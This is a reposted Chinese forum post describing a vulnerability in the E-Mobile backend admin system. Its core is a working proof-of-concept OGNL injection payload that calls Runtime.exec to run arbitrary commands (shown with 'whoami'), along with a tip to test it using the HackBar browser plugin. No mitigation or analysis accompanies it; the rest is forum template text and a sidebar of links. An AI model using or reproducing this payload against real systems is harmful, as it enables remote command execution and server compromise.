E-Mobile 后台管理系统漏洞

讨论社区 / 日志 / 帖子详情

E-Mobile 后台管理系统漏洞

2022-08-03 09:57:03

236

{{single.collect_count}}

转载：https://blog.csdn.net/qq_27446553/article/details/68203308

E-Mobile 后台管理系统漏洞
可以通过火狐hackbar插件进行验证
Poc :

message=(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#w=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter()).(#w.print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(#parameters.cmd[0]).getInputStream()))).(#w.close())&cmd=whoami

复现图片如下：

执行结果图片描述

上一页：layui后台管理系统 - 权限树右侧菜单

下一页：基于SpringBoot开发的后台管理、系统脚手架Github\Gitee收集

回帖

全部回帖（{{commentCount}}）

{{item.user.nickname}}

{{item.user.group_title}}

{{item.friend_time}}

{{item.content}}

{{item.like > 0 ? item.like : '点赞'}} {{item.comment_content_show ? '取消' : '回复'}} 删除

回帖

{{reply.user.nickname}}

{{reply.user.group_title}}

{{reply.friend_time}}

{{reply.content}}

{{reply.like > 0 ? reply.like : '点赞'}} {{reply.comment_content_show ? '取消' : '回复'}} 删除

回帖

收起

没有更多啦~

{{commentLoading ? '加载中...' : '查看更多评论'}}

一个专属于OneKeyAdmin的技术交流平台，记录OneKeyAdmin开发者的成长与进步。

主题帖

6221

回帖数

147

{{userInfo.describe}}

文章

{{blog_count}}

回帖

{{blog_comment_count}}

收藏

{{blog_collect_count}}

文章

-

评论

-

粉丝

-

1 Yandex企业邮箱注册

2 WordPress Rest API 入门详解

3 gitlab中国官方网站

4 Thinkphp5.0 获取新增数据的ID

5 攻入网站后台的方法

6 thinkphp5 解决跨域问题

7 Thinkphp6 的 where 查询条件 and 和 or 的操作

8 PHP的exec()函数用法详解

9 Vue3官网使用及简介

10 thinkphp6配置连接微软的sqlserver数据库